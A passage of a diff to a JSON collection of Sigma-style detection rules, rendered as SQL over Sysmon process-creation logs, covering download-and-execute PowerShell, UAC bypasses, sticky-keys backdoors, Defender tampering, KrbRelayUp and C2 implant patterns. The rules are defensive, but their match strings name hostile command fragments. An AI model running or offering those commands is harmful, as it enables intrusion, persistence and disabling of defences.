'\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - "id": "55f0a3a1-846e-40eb-8273-677371b8d912", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. 
This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ 
\\\\]')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", 
@@ -9499,798 +9243,736 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", - "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "status": "experimental", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Sometimes used by developers or system administrators for debugging purposes" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product 
= 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + ], + "filename": "proc_creation_win_pua_process_hacker.yml" + }, + { + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "status": "experimental", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine 
LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", - "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", - "author": "Florian Roth (Nextron Systems)", + "title": 
"Suspicious Schtasks Schedule Types", + "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "status": "experimental", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Legitimate processes that run at logon. Filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious 
manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% 
DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Legitimate administration use but user and host must be 
investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.g0069" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE 
'%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image 
LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session 
without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian 
Roth (Nextron Systems)", + "description": "Detects suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or 
